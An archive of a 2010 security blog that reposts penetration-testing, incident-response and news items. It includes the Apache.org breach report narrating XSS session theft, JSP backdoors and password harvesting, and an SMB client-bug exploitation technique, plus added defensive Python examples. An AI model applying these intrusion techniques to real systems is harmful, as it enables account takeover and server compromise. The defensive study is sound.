Thursday, April 29, 2010

Howto: DNS Enumeration


Penetration testing is a method of evaluating the security of a computer system or network by simulating an attack from a malicious source. The process involves an active analysis of the system for any potential vulnerabilities that may result from poor or improper system configuration, known and/or unknown hardware or software flaws, or operational weaknesses in process or technical countermeasures.

The first step of penetration testing (more accurately called information security testing) is information gathering. Information gathering is part of the preparatory pre-attack phase and involves accumulating data regarding a target's environment and architecture, usually for the purpose of finding ways to intrude into that environment. Information gathering can reveal system vulnerabilities and identify the ease with which they can be exploited. This is the easiest way for an attacker to gather information about computer systems and the companies they belong to. The purpose of this phase is to learn as much as you can about a system, its remote access capabilities, its ports and services, and any specific aspects of its security.

Using a combination of tools and techniques, attackers can take an unknown entity and reduce it to a specific range of domain names, network blocks, subnets, routers, and individual IP addresses of systems directly connected to the Internet, as well as many other details pertaining to its security posture. Although there are many types of information gathering techniques, they are primarily aimed at discovering information related to the following environments: Internet, intranet, remote access, and extranet.

To read more details, you can download my article here:

Sunday, April 25, 2010

Manual Verification of SSL/TLS Certificate Trust Chains using Openssl

I found two articles about verification of SSL/TLS certificate trust chains using a manual verification technique.

Part One:
http://blog.taddong.com/2010/04/manual-verification-of-ssltls.html
Part Two:
http://blog.taddong.com/2010/04/manual-verification-of-ssltls_24.html

To read more, please refer to this link:

http://isc.sans.org/diary.html?storyid=8686

Friday, April 16, 2010

CRITICAL LOG REVIEW CHECKLIST FOR SECURITY INCIDENTS

This cheat sheet presents a checklist for reviewing critical logs when responding to a security incident. It can also be used for routine log review. To download it, click here:
http://www.securitywarriorconsulting.com/security-incident-log-review-checklist.pdf


General Approach
  • Identify which log sources and automated tools you can use during the analysis.
  • Copy log records to a single location where you will be able to review them.
  • Minimize “noise” by removing routine, repetitive log entries from view after confirming that they are benign.
  • Determine whether you can rely on logs’ time stamps; consider time zone differences.
  • Focus on recent changes, failures, errors, status changes, access and administration events, and other events unusual for your environment.
  • Go backwards in time from now to reconstruct actions after and before the incident.
  • Correlate activities across different logs to get a comprehensive picture.
  • Develop theories about what occurred; explore logs to confirm or disprove them.

Typical Log Locations
  • Linux OS and core applications: /var/log
  • Windows OS and core applications: Windows Event Log (Security, System, Application)
  • Network devices: usually logged via Syslog; some use proprietary locations and formats.

What to Look for on Linux
  • Successful user login: “Accepted password”, “Accepted publickey”, “session opened”
  • Failed user login: “authentication failure”, “failed password”
  • User log-off: “session closed”
  • User account change or deletion: “password changed”, “new user”, “delete user”
  • Sudo actions: “sudo: … COMMAND=…”, “FAILED su”
  • Service failure: “failed” or “failure”
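
The Linux phrases above can be turned into a first-pass triage filter. The following Python sketch is an added example, not part of the original cheat sheet: it classifies auth-log lines by the checklist's phrases, drops routine cron session noise, and flags a source address that logs in successfully after repeated failures. The log lines, the cron noise rule and the threshold of three failures are constructed assumptions.

```python
import re
from collections import Counter

# Checklist phrases from "What to Look for on Linux".
# Order matters: the first matching category wins, so the generic
# "failed"/"failure" service rule comes last.
CATEGORIES = [
    ("sudo_action", re.compile(r"sudo: .*COMMAND=|FAILED su")),
    ("login_failure", re.compile(r"authentication failure|failed password", re.I)),
    ("login_success", re.compile(r"accepted password|accepted publickey|session opened", re.I)),
    ("logoff", re.compile(r"session closed", re.I)),
    ("account_change", re.compile(r"password changed|new user|delete user", re.I)),
    ("service_failure", re.compile(r"\bfail(?:ed|ure)\b", re.I)),
]

# Assumption: cron session open/close lines were confirmed benign and are noise.
NOISE = re.compile(r"\bCRON\[\d+\]")
SOURCE = re.compile(r"\bfrom (\d{1,3}(?:\.\d{1,3}){3})\b")

# Constructed sample input (documentation address ranges, made-up hosts and users).
SAMPLE_LOG = [
    "Apr 16 09:12:01 web1 sshd[2211]: Failed password for invalid user admin from 203.0.113.7 port 51122 ssh2",
    "Apr 16 09:12:03 web1 sshd[2211]: Failed password for root from 203.0.113.7 port 51126 ssh2",
    "Apr 16 09:12:06 web1 sshd[2211]: Failed password for alice from 203.0.113.7 port 51131 ssh2",
    "Apr 16 09:12:09 web1 sshd[2215]: Accepted password for alice from 203.0.113.7 port 51140 ssh2",
    "Apr 16 09:12:09 web1 sshd[2215]: pam_unix(sshd:session): session opened for user alice by (uid=0)",
    "Apr 16 09:13:00 web1 CRON[2400]: pam_unix(cron:session): session opened for user root by (uid=0)",
    "Apr 16 09:13:30 web1 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/passwd bob",
    "Apr 16 09:13:31 web1 passwd[2301]: pam_unix(passwd:chauthtok): password changed for bob",
    "Apr 16 09:20:00 web1 sshd[2215]: pam_unix(sshd:session): session closed for user alice",
    "Apr 16 09:20:01 web1 CRON[2400]: pam_unix(cron:session): session closed for user root",
    "Apr 16 09:25:00 web1 systemd[1]: nginx.service: Failed with result 'exit-code'.",
    "Apr 16 09:30:00 web1 sshd[2500]: Accepted publickey for carol from 198.51.100.20 port 40022 ssh2",
]


def classify(line):
    """Return the checklist category for one log line, or None if no phrase matches."""
    for name, pattern in CATEGORIES:
        if pattern.search(line):
            return name
    return None


def triage(lines, noise=NOISE, threshold=3):
    """Count events per category and flag successes that follow repeated failures.

    Returns (counts, failures_by_source, suspicious), where suspicious is a list
    of (source_ip, prior_failure_count, log_line) tuples.
    """
    counts = Counter()
    failures = {}
    suspicious = []
    for line in lines:
        if noise.search(line):
            continue  # routine entries already confirmed benign
        category = classify(line)
        if category is None:
            continue
        counts[category] += 1
        match = SOURCE.search(line)
        src = match.group(1) if match else None
        if src is None:
            continue
        if category == "login_failure":
            failures[src] = failures.get(src, 0) + 1
        elif category == "login_success" and failures.get(src, 0) >= threshold:
            suspicious.append((src, failures[src], line))
    return counts, failures, suspicious


if __name__ == "__main__":
    counts, failures, suspicious = triage(SAMPLE_LOG)
    for name, total in counts.most_common():
        print(f"{name:16} {total}")
    for src, prior, line in suspicious:
        print(f"REVIEW: success from {src} after {prior} failures -> {line}")
```

Because matching is by substring, a hit is a pointer to a line worth reading rather than a verdict, and the time stamps still need the time zone check from the general approach.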

What to Look for on Windows
Event IDs are listed below for Windows 2000/XP. For Vista/7 security event ID, add 4096 to the event ID. Most of the events below are in the Security log; many are only logged on the domain controller.
  • User logon/logoff events: successful logon 528, 540; failed logon 529-537, 539; logoff 538, 551, etc.
  • User account changes: created 624; enabled 626; changed 642; disabled 629; deleted 630
  • Password changes: to self: 628; to others: 627
  • Service started or stopped: 7035, 7036, etc.
  • Object access denied (if auditing enabled): 560, 567, etc.

What to Look for on Network Devices
Look at both inbound and outbound activities. Examples below show log excerpts from Cisco ASA logs; other devices have similar functionality.
  • Traffic allowed on firewall: “Built … connection”, “access-list … permitted”
  • Traffic blocked on firewall: “access-list … denied”, “deny inbound”, “Deny … by”
  • Bytes transferred (large files?): “Teardown TCP connection … duration … bytes …”
  • Bandwidth and protocol usage: “limit … exceeded”, “CPU utilization”
  • Detected attack activity: “attack from”
  • User account changes: “user added”, “user deleted”, “User priv level changed”
  • Administrator access: “AAA user …”, “User … locked out”, “login failed”

What to Look for on Web Servers
  • Excessive access attempts to non-existent files
  • Code (SQL, HTML) seen as part of the URL
  • Access to extensions you have not implemented
  • Web service stopped/started/failed messages
  • Access to “risky” pages that accept user input
  • Look at logs on all servers in the load balancer pool
  • Error code 200 on files that are not yours
  • Failed user authentication: Error code 401, 403
  • Invalid request: Error code 400
  • Internal server error: Error code 500

How to choose your Information Security Training

Article taken from: http://www.offensive-security.com/blog/offsec/questions-information-security-training-provider/

In the past couple of years, the economy has struck hard on organizations seeking to educate their employees. Training budgets have been cut down, and choosing the right course that will give you real Return on Investment is not an easy job. This is especially true in the offensive InfoSec arena, where training standards and qualifications are weakly defined. So how can you make sure you're getting your money’s worth ?
Welcome to our “10 questions you should be asking your InfoSec Training Provider“.

1. What are the objectives of the training ?

What will the training do for you ? Anyone promising you that you will be a “hardcore penetration tester” or a “security expert” after their 5 day class has never run a pentest, or otherwise has no clue what they are talking about. Learning *any* profession in 5 days is unrealistic, let alone one as complex as IT Security, or penetration testing. This is one of the first questions I ask before attending a training… it allows me to set my goals for the course and gives me a baseline for my expectations.

2. What topics does the course cover ?

Always read the syllabus of the course you want to attend, before you attend it.  Try finding other people who have taken the class, (if possible) and get their opinion. Try to see if the syllabus follows a reasonable methodology, or if it’s just a collection of topics. If you see a list of 1500 tools on the syllabus – expect to spend around 0.6 minutes per tool. 

3. Who is your trainer ?

Are they well known in their field ? Do they have training experience ? Are they involved in the security community ? Do they practice what they preach? Although these are 4 separate questions, they all relate to one thing – the ability of the trainer to provide the goods you paid so dearly for. Finding a GOOD InfoSec trainer is NOT easy. Most computer genii are usually lacking in their social skills – something a good trainer must have.

4. What previous reviews does the class have ?

Running a few internet searches for the name of your class, or the name of the trainer is a must. Find out what people have to say about their experiences – during and after the class. Although you can’t believe *everything* on the internet, taking an average of all the reviews will usually give you a solid idea of what you are getting into.

5. What is the ratio of students to trainers ?

How many students will there be in the class ? Some training providers cram more than 30 students in one class – often with a single instructor. During a 5 day period, a trainer can’t give personal attention to 30 people, no matter what. In general, smaller classes mean a more intimate environment, more attention from the trainer, and a more productive and engaging experience.

6. What is the ratio between theory and hands-on exercises ?

Remember the famous saying “In theory, there is no difference between theory and practice – But in practice, there is”. If you don’t exercise what you learn, you are less likely to retain or understand it as nothing replaces practical experience. Ask for a rough ratio estimate for “theory VS exercise” for your class – anything above 40% class-time spent on exercises is a good sign. Of course, this greatly depends on the quality of the exercises too.

7. How often is the course updated ? Is the material relevant to modern day situations ?

Learning methods and techniques on antiquated systems will bring you little benefit in the real world. Hacking a Windows 2000 SP4 machine with RPC DCOM doesn’t cut it any more. On the other hand, don’t expect to learn “Bypassing Windows 7 Stack Protection” in an introductory buffer overflows course. You need to gauge the balance between these two elements carefully.

8. What are the pre-requisites for the class ?

How should you prepare yourself for the class? Do you need to refresh your knowledge on certain topics? Nothing is more frustrating than coming to a class, and then lagging behind because you are not up to par with the class requirements. Not good for your learning experience, and not good for your self esteem – on the other hand “no pre-requisites required” might indicate lack of depth. If the pre-requisites were defined well by the training provider, it’s definitely a good resource to use to evaluate the relevancy of the course to you.

9. Is there a certification involved ? What is its value ?

The “value” of a certification can be measured in the real world using two main indicators:
  • The “market value” of the certification – how popular is this certification in the workforce ? Is the certificate recognized and appreciated by the industry ? And of course, will it help you get a (better) job ?
  • The “practical value” of the certification – or as Eddie Murphy would say “WHAT HAVE YOU DONE FOR ME LATELY?”.  What real world skills does the certificate prove? If it proves you can memorize 100 questions, you might not be up to the job when confronted with a real world scenario.

10. What post training benefits are provided?

What ongoing benefits will you get from the training provider, if any ? Is there a continuation path for the training ? Will the trainers be available for future questions or issues that may arise ? Is there a student community you can join, to discuss the course with other students ? Or in other words, what kind of “post customer service” can you expect ?
These 10 questions should cover all the important elements you should verify before committing your valuable time and limited training budget to any service provider. The average person only gets a limited number of training opportunities per year, therefore you should always maximize the return you receive.

Proof of Concept for MS10-006 SMB Client-Side Bug

This is a technique to automate, with no user interaction at all, SMB client-side bug exploitation targeting the Domain Master Browser (DMB) or PDC (only the PDC can be a DMB), which is basically the perfect target in a pentest. Targeting the DMB is perfect, simply because if you control that box, you'll control all computers joined to this box tree.

Since the SRD is once again downplaying SMB client-side bugs, I think it's important to share this kind of trick.

It's also important to mention that Browser and NBNS abuse has been well known for a long time, as these protocols weren't developed with security in mind; this blog post is a simple real case example.

There are two ways to automate an SMB client-side bug:

  • NBNS Spoofing (requires some "kind" of user interaction in some way; anyway, in a corporate network it works pretty well)
  • Browser Protocol Abusing (the funny one)

In this case I will cover a form of Browser Protocol Abusing.

To see more details:
http://g-laurent.blogspot.com/2010/04/turning-smb-client-bug-to-server-side.html

Wednesday, April 14, 2010

Top 5 Security No Brainers for Businesses

Occasionally folks forget about covering the fundamentals of security and start off down a rabbit hole following some shiny new technology that turns out to be just a rat hole. With today's limited security budgets you need to be sure that you've adequately covered your highest risk areas before moving on to other things. The high-risk areas are, of course, not the same for everyone and will change on you fairly frequently. The bad guys are always mixing it up; the attacks we see prevalent today are not those that we saw just a few years ago. Thus the reason for this article, to take a look at the top 5 security solutions you can put in place today to cover the widest scope of current and emerging threats. In many respects these solutions are considered obvious "no brainers". But, you'd be surprised by how many companies (big and small) that don't have them in place. Many times it is the obvious that temporarily escapes us (or at least escapes those holding the purse strings ☺)
These 5 items working together will stop more cyber attacks on your data, network and users than any other 5 items in the marketplace today. There are lots of other very useful security solutions on the market but when it comes to picking the top five most effective and readily available ones here are my choices:
Firewall – The keystone of network defense for a decade or more is still required for solid foundational security. Its job is still fairly simplistic; control what data flows can go where. Without firewalls in place to drop unwanted flows, your job of protecting your assets increases exponentially. Firewalls need to be present at your external perimeters but also inside of your network for secure segmentation of data. Deploying firewalls internally is a relatively new best practice. It is largely driven by the dissolution of any sense of a tangible, reliable network border that can differentiate trusted network traffic from untrusted external network traffic anymore. Our nice clean Internet border of old just doesn't exist anymore in modern networks. What has also recently changed is that firewalls are getting smarter and more granular in their definition of data flows. It is now common for a firewall to be able to control a data flow based on the type of application or even application function it represents. For example, a firewall can block a SIP voice call based on what number was dialed.
Secure Router (FW, IPS, QoS, VPN) – Routers are everywhere in most networks. By tradition they have been used just as traffic cops for flows. But modern routers can do so much more than that! Routers are chock full of security features, sometimes even more so than a modern firewall. Most routers in the industry today are capable of robust firewalling features, some semblance of useful IDS/IPS functionality, robust quality of service and traffic management tools and of course strong Virtual Private Network data encryption features. The list doesn't stop there either. The power of modern routers to add to the security of your network is commonly overlooked today. With modern vpn technology it is fairly straight-forward to start encrypting all of the data crossing your WAN links, but very few people do so. It is also too atypical that folks use the firewall functions and IPS features in their routers. Turn 'em on and see your security posture improve!
Wireless WPA2 – This is the no-brainer of them all. If you aren't using WPA2 wireless security then stop what you are doing and form a plan to start doing so. Many other methods of wireless security are not secure and can be compromised in minutes. Don't make it easy for the bad guys, turn on WPA2 with AES encryption today.
Email Security – We all know email is currently the top attack vector used by black hats. Viruses, malware and worms all love to use email as their propagation method. Email is also the top way we lose most of our sensitive data. On top of the threats and data loss we experience through email we also have simple junk mail, spam. About 90% of all email sent today is spam! A good email security solution will get rid of the junk and filter out the malicious stuff as well. It is likely that if you are getting a lot of spam through your current system then you are getting even more malware through it. The thought process being that the spam features in email security gateways is usually the focus, core competency of the product. So if it is not doing its job dropping spam then it certainly isn't doing its job catching malware and data leakage.
Web Security – Threats coming from port 80 and 443 are rising faster than any other threat vector today. The expanding complexity of web based attacks necessitates that a company deploy a robust web security solution. Simple URL filtering has been with us for years and it is a core component to web security for sure. However, web security needs more than just URL filtering; it needs AV scanning, malware scanning, IP reputation awareness, dynamic URL categorization techniques and Data leakage prevention functions. Attackers are compromising high profile sites at such an alarming rate that if we just relied on URL white list, black list filtering we'd have nothing left in the white list anymore! Any web security solution has to be able to dynamically scan web traffic to make a decision on its validity. Of all the solutions listed here, it is in web security where taking the risk of deploying a cutting edge, best of breed solution will pay off the most. The other solutions on the list are, for the most part established and mature. Web security solutions bells and whistles are coming out as fast as the hackers are building new attacks. Well ok, not quite that fast.
What are your thoughts on my choices for top 5 security no brainers? Think I got it wrong or right? If you had to add a sixth one what would it be?
If your company doesn't have all of these 5 in place today, go bang on some doors and raise the roof on awareness! Don't let it all burn!

The opinions and information presented here are my PERSONAL views and not those of my employer. I am in no way an official spokesperson for my employer.

Article taken from: http://www.networkworld.com/community/node/59971

How security professionals monitor their kids

April 12, 2010 (CSO) Cell phones, texting, IM, e-mail, Facebook, MySpace -- kids are interconnected today in ways hardly imagined two decades ago. But these technology-based communication platforms also enable new forms of an age-old parenting strategy: monitoring your kids.
Who are they talking to? What are they talking about? Are they going where they said they are going?
Most of us with children think about this stuff. But parents who work by day as security professionals live in a heightened state of risk awareness, and also have the expertise and the tools to monitor kids' behavior and communication in many ways.
Is it any easier to put the proper measures in place to ensure your child's security since you already have an expertise in this area? Or do you go overboard because you are hyperattuned to risk? And what is the right balance of freedom and guidance to provide for kids?
Turns out it was a tricky issue before social networking, and remains tricky now. Here are views and strategies collected from an array of security professionals.
'Spying' on your kids?
Martin McKeay, a CISSP and security consultant who maintains a popular network security web site and blog, recently found out how divided security professionals are on the issue of monitoring children. McKeay, the father of two boys aged 8 and 10, received an intriguing message recently from someone on a mailing list who wanted his opinion.
"It asked 'What kind of software can I use to spy on my children and read their every email?'" said McKeay, who was slightly taken aback by the wording and the person's obvious, no-bones-about-it attitude that they intended to pry into their kids' lives without warning or limit.
"I consider that going over the top. So I went on Twitter and asked other people: 'How do you think this should be handled? Is it through monitoring software, or parental relationships?'" McKeay recounted. "With rare exceptions, most people said both. But there were some strong opinions about monitoring what your kids do."
McKeay said he was surprised that his responses, mostly from other security professionals, revealed many were willing to do at least some covert monitoring with software programs without the kids' knowledge or consent. The majority felt open and frank discussion, along with some disclosed parental control with products such as Net Nanny, and other similar programs that block web sites and monitor activity, was the best approach.
But he estimates about 25 percent of those who answered his question thought monitoring all actions without telling their kids they were doing so was OK.
"I kind of expected in the security community that more people would realize some of the dangers of that kind of secret monitoring. But I guess when it comes to your kids, most people seem to be more concerned with keeping them safe online than the potential impact on the relationship."
By danger, McKeay means loss of trust when the child realizes he is being "spied on," as he puts it. He believes secret, and also open-but-excessive, monitoring of a child's activities infringes on a kid's privacy rights and will set parents up for potential damage to the relationship with their children in the future. He also thinks leaving them no room to make mistakes means they won't learn the security skills they need when navigating the dangers of the internet.

To see full article, read here:
http://www.computerworld.com/s/article/print/9175373/How_security_professionals_monitor_their_kids?taxonomyName=Security&taxonomyId=17

apache.org incident report for 04/09/2010

Apache.org services recently suffered a direct, targeted attack against our infrastructure, specifically the server hosting our issue-tracking software.

The Apache Software Foundation uses a donated instance of Atlassian JIRA as an issue tracker for our projects. Among other projects, the ASF Infrastructure Team uses it to track issues and requests. Our JIRA instance was hosted on brutus.apache.org, a machine running Ubuntu Linux 8.04 LTS.

Password Security

If you are a user of the Apache hosted JIRA, Bugzilla, or Confluence, a hashed copy of your password has been compromised.

JIRA and Confluence both use a SHA-512 hash, but without a random salt. We believe the risk to simple passwords based on dictionary words is quite high, and most users should rotate their passwords.

Bugzilla uses a SHA-256, including a random salt. The risk for most users is low to moderate, since pre-built password dictionaries are not effective, but we recommend users should still remove these passwords from use.

In addition, if you logged into the Apache JIRA instance between April 6th and April 9th, you should consider the password as compromised, because the attackers changed the login form to log them.
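
The difference between the two storage schemes can be shown in a few lines. This Python sketch is an added example, not code from the incident report or from either product: it checks a hash dump the way a defender assessing exposure would, against a table of dictionary-word hashes computed once. The users, passwords and word list are constructed, and the salted construction (`sha256(salt + password)`) is an assumption chosen for illustration, not Bugzilla's actual format.

```python
import hashlib
import hmac
import os

# Constructed word list standing in for a pre-built password dictionary.
WORDLIST = ["password", "sunshine", "letmein"]

# Constructed accounts: two users share a dictionary word, one uses a strong password.
ACCOUNTS = {"alice": "sunshine", "bob": "sunshine", "carol": "c0rrect-h0rse-9!x"}


def unsalted_sha512(password):
    """Unsalted scheme: the same password always yields the same digest."""
    return hashlib.sha512(password.encode()).hexdigest()


def salted_sha256(password, salt=None):
    """Salted scheme (illustrative layout): a random per-user salt is hashed with the password."""
    salt = os.urandom(16) if salt is None else salt
    return salt, hashlib.sha256(salt + password.encode()).hexdigest()


def verify_salted(password, salt, digest):
    """Login check for the salted scheme, using a constant-time comparison."""
    return hmac.compare_digest(salted_sha256(password, salt)[1], digest)


def build_table(words, hash_fn=unsalted_sha512):
    """Pre-compute digest -> word once; reusable against every unsalted dump."""
    return {hash_fn(word): word for word in words}


def exposed_by_table(digests, table):
    """Users whose stored digest appears in the pre-built table (one lookup each)."""
    return {user: table[d] for user, d in digests.items() if d in table}


def shared_hash_groups(digests):
    """Groups of users with identical digests, which reveals shared passwords."""
    groups = {}
    for user, digest in digests.items():
        groups.setdefault(digest, []).append(user)
    return sorted(sorted(users) for users in groups.values() if len(users) > 1)


# What each database would hold after a dump.
UNSALTED_DUMP = {user: unsalted_sha512(pw) for user, pw in ACCOUNTS.items()}
SALTED_DUMP = {user: salted_sha256(pw) for user, pw in ACCOUNTS.items()}
SALTED_DIGESTS = {user: digest for user, (_, digest) in SALTED_DUMP.items()}

if __name__ == "__main__":
    table = build_table(WORDLIST)
    print("unsalted, exposed by table:", exposed_by_table(UNSALTED_DUMP, table))
    print("unsalted, shared digests:  ", shared_hash_groups(UNSALTED_DUMP))
    print("salted, exposed by table:  ", exposed_by_table(SALTED_DIGESTS, table))
    print("salted, shared digests:    ", shared_hash_groups(SALTED_DIGESTS))
```

A salt only defeats the pre-built table; a dictionary word can still be tested against each salted entry one user at a time, which is why the report still asks users to retire those passwords.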

What Happened?

On April 5th, the attackers via a compromised Slicehost server opened a new issue, INFRA-2591. This issue contained the following text:

ive got this error while browsing some projects in jira http://tinyurl.com/XXXXXXXXX [obscured]

Tinyurl is a URL redirection and shortening tool. This specific URL redirected back to the Apache instance of JIRA, at a special URL containing a cross site scripting (XSS) attack. The attack was crafted to steal the session cookie from the user logged-in to JIRA. When this issue was opened against the Infrastructure team, several of our administrators clicked on the link. This compromised their sessions, including their JIRA administrator rights.

At the same time as the XSS attack, the attackers started a brute force attack against the JIRA login.jsp, attempting hundreds of thousands of password combinations.

On April 6th, one of these methods was successful. Having gained administrator privileges on a JIRA account, the attackers used this account to disable notifications for a project, and to change the path used to upload attachments. The path they chose was configured to run JSP files, and was writable by the JIRA user. They then created several new issues and uploaded attachments to them. One of these attachments was a JSP file that was used to browse and copy the filesystem. The attackers used this access to create copies of many users' home directories and various files. They also uploaded other JSP files that gave them backdoor access to the system using the account that JIRA runs under.

By the morning of April 9th, the attackers had installed a JAR file that would collect all passwords on login and save them. They then sent password reset mails from JIRA to members of the Apache Infrastructure team. These team members, thinking that JIRA had encountered an innocent bug, logged in using the temporary password sent in the mail, then changed the passwords on their accounts back to their usual passwords.

One of these passwords happened to be the same as the password to a local user account on brutus.apache.org, and this local user account had full sudo access. The attackers were thereby able to login to brutus.apache.org, and gain full root access to the machine. This machine hosted the Apache installs of JIRA, Confluence, and Bugzilla.

Once they had root on brutus.apache.org, the attackers found that several users had cached Subversion authentication credentials, and used these passwords to log in to minotaur.apache.org (aka people.apache.org), our main shell server. On minotaur, they were unable to escalate privileges with the compromised accounts.

About 6 hours after they started resetting passwords, we noticed the attackers and began shutting down services. We notified Atlassian of the previously unreported XSS attack in JIRA and contacted SliceHost. Atlassian was responsive. Unfortunately, SliceHost did nothing and 2 days later, the very same virtual host (slice) attacked Atlassian directly.

We started moving services to a different machine, thor.apache.org. The attackers had root access on brutus.apache.org for several hours, and we could no longer trust the operating system on the original machine.

By April 10th, JIRA and Bugzilla were back online.

On April 13th, Atlassian provided a patch for JIRA to prevent the XSS attack. See JRA-20994 and JRA-20995 for details.

Our Confluence wiki remains offline at this time. We are working to restore it.

What worked?
  • Limited use passwords, especially one-time passwords, were a real lifesaver. If JIRA passwords had been shared with other services/hosts, the attackers could have caused widespread damage to the ASF's infrastructure. Fortunately, in this case, the damage was limited to rooting a single host.
  • Service isolation worked with mixed results. The attackers must be presumed to have copies of our Confluence and Bugzilla databases, as well as our JIRA database, at this point. These databases include hashes of all passwords used on those systems. However, other services and hosts, including LDAP, were largely unaffected.

What didn't work?
  • The primary problem with our JIRA install is that the JIRA daemon runs as the user who installed JIRA. In this case, it runs as a jira role-account. There are historical reasons for this decision, but with 20/20 hindsight, and in light of the security issues at stake, we expect to revisit the decision!
  • The same password should not have been used for a JIRA account as was used for sudo access on the host machine.
  • Inconsistent application of one time passwords; We required them on other machines, but not on brutus. PAM was configured to allow optional use of OPIE, but not all of our sudoers had switched to it.
  • SSH passwords should not have been enabled for login over the Internet. Although the Infrastructure Team had attempted to configure the sshd daemon to disable password-based logins, having UsePAM yes set meant that password-based logins were still possible.
  • We use Fail2Ban for many services, but we did not have it configured to track JIRA login failures.
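
The sshd point above can be checked mechanically. This Python sketch is an added example, not part of the incident report: it reads an sshd_config and lists every path that still accepts a typed password. It assumes the documented OpenSSH behaviour that, with `UsePAM yes`, keyboard-interactive authentication (`ChallengeResponseAuthentication`, renamed `KbdInteractiveAuthentication` in later releases) is handled by PAM and usually prompts for a password; the report does not say which directive was left enabled on brutus. `Match` blocks are not evaluated, and both sample configurations are constructed.

```python
# OpenSSH built-in defaults for the three directives that matter here.
DEFAULTS = {
    "passwordauthentication": "yes",
    "kbdinteractiveauthentication": "yes",
    "usepam": "no",
}

# Older configurations use the deprecated name for the same setting.
ALIASES = {"challengeresponseauthentication": "kbdinteractiveauthentication"}

# Constructed example: password logins "disabled", but PAM still offers a prompt.
WEAK_CONFIG = """\
# /etc/ssh/sshd_config (constructed sample)
Port 22
PasswordAuthentication no
UsePAM yes
"""

# Constructed example: both password-like paths closed, PAM kept for sessions.
HARDENED_CONFIG = """\
Port 22
PasswordAuthentication no
ChallengeResponseAuthentication no
PubkeyAuthentication yes
UsePAM yes
"""


def parse_sshd_config(text):
    """Return the global settings as {lowercase keyword: lowercase value}.

    sshd uses the first value it sees for a keyword, so later duplicates are
    ignored. Parsing stops at the first Match block (not evaluated here).
    """
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        key = parts[0].lower()
        if key == "match":
            break
        key = ALIASES.get(key, key)
        settings.setdefault(key, parts[1].strip().lower())
    return settings


def password_login_paths(text):
    """List the authentication paths that still accept a typed password."""
    cfg = {**DEFAULTS, **parse_sshd_config(text)}
    paths = []
    if cfg["passwordauthentication"] == "yes":
        paths.append("PasswordAuthentication")
    if cfg["usepam"] == "yes" and cfg["kbdinteractiveauthentication"] == "yes":
        paths.append("keyboard-interactive via PAM")
    return paths


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        paths = password_login_paths(text)
        print(f"{name}: {'password login possible via ' + ', '.join(paths) if paths else 'no password paths'}")
```

On a live host, `sshd -T` prints the effective configuration and can be fed to the same check instead of the file.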
To see full article, please read the link below:
https://blogs.apache.org/infra/entry/apache_org_04_09_2010

How to unwrap PL/SQL

The Oracle wrap utility can be used to obfuscate PL/SQL code, to ensure it can't be easily read. The wrapping process for Oracle 9g was described by Pete Finnigan, but for 10g and 11g it still remains a bit of a mystery.
To see pdf file about How to Unwrap PL/SQL, see the link below:
http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Finnigan.pdf

The unwrapping steps for 10g are nicely described in the Oracle Hacker's Handbook, but the actual substitution table needed to decode the package is omitted. A lot of people seem to know how to do it though, there is even an online unwrapper available. See the link below:
http://hz.codecheck.ch/UnwrapIt/Unwrap.jsp
A Russian-made closed source tool is also available, but tends to upset virus scanners.

To download unwrap.py, please click the link below:
http://www.teusink.net/unwrap.py

For more details, please refer here:
http://blog.teusink.net/2010/04/unwrapping-oracle-plsql-with-unwrappy.html

Tuesday, April 13, 2010

Netsparker® Community Edition

We are proud to announce Free Netsparker® Community Edition. It's a free edition of our False Positive free scanner Netsparker for the community so you can start securing your website now. It's user friendly, fast, smart and as always False Positive Free.

Netsparker® Community Edition shares many features with Netsparker® Professional and just like Netsparker Professional, Community Edition is also False Positive Free. It can detect SQL Injection and Cross-site Scripting issues better than many other scanners (if not all), and it's completely FREE.

http://www.mavitunasecurity.com/communityedition/


Very powerful! Nice!! Try it lorr...better than other scanner

Wednesday, April 07, 2010

Introducing Meta-Information XSS

A few months back I was playing around with DNS text records and started thinking about what I could include in them. Given that so much of my time is spent with web application security, my first attempt was a simple XSS. Then I just needed a web page to display the information. I started looking at websites that allow you to perform DNS resolution and websites that verify SPF filters. None of these websites filtered the data. This led me to start looking at other types of meta-information (or metadata) we access, manipulate and view on a daily basis but never really consider as potentially harmful. Other places that came up included: Whois data, SSL Certificate info, and Server Banners (SMTP/HTTP). I'm sure there are others but these are the ones I looked at.

As I was looking into contacting the various websites, I started thinking about how you could classify this type of XSS. While data has to be provided in some of the requests, you aren't providing the attack, so it's not really reflected. At the same time nothing is stored on the server to be displayed to future users (at least nothing malicious), so it's not really persistent. It's also definitely not DOM based. That led to the conclusion that this needed a new classification and I decided to go with Meta-Information Cross Site Scripting or miXSS (pronounced my-XSS).

To download whitepaper and presentation:
http://blog.ncircle.com/blogs/vert/archives/2010/04/introducing_metainformation_xs.html

Friday, April 02, 2010

Digital Forensics Case Leads: New Gear, New PDFs Abuse, and Defeating TrueCrypt

Logicube releases new forensics gear, Didier Stevens discovers a new way to do interesting things with a PDF and a cooperative user, and Passware provides a means to defeat TrueCrypt.

Logicube has released two devices which look interesting. The MPFS or Massive Portable Forensic Storage provides up to 8TB of storage capacity for acquiring multiple images. The device may be attached to a forensic analyst’s workstation via firewire, USB, or eSATA. The unit is compatible with Logicube’s Dossier imager and Logicube’s second new device, the NETConnect which as the name suggests, allows network access to forensic images. Based on the description, NETConnect is essentially a file server which enables multiple investigators to access forensic images as soon as they are acquired. The device supports Windows, Mac, and Linux and includes support for CIFS and NFS. (I’ve not had the opportunity to test either device but if Logicube or anyone else wants to send me a set, I will be happy to do a write up.)

If you’ve ever analyzed a PDF, you’ve probably used a tool created by Didier Stevens. Didier has figured out a way to make certain PDF readers execute embedded binaries. Check out his explanation in Good Reads.

Disk encryption in various forms is becoming more common when it comes to incident response and forensics. In response to its customer’s requests, Passware has updated their flagship product to handle TrueCrypt. Their product also has support for BitLocker.

To read more:
http://blogs.sans.org/computer-forensics/2010/04/01/digital-forensics-case-leads-gear-pdfs-abuse-defeating-truecrypt/

Sharing vs. your privacy on Facebook

(CNN) -- Facebook is, by its nature, a social experience.

But as the undisputed king of social networking expands ways for its users to interact, it's raising more questions about how much of their information is made available to people they don't know.

In some cases, users may not even realize it's happening.

One example is the hundreds of thousands of developers approved by Facebook to create games, quizzes and other applications. Some of those developers are able to access basic information about users after a Facebook friend has started using their application.

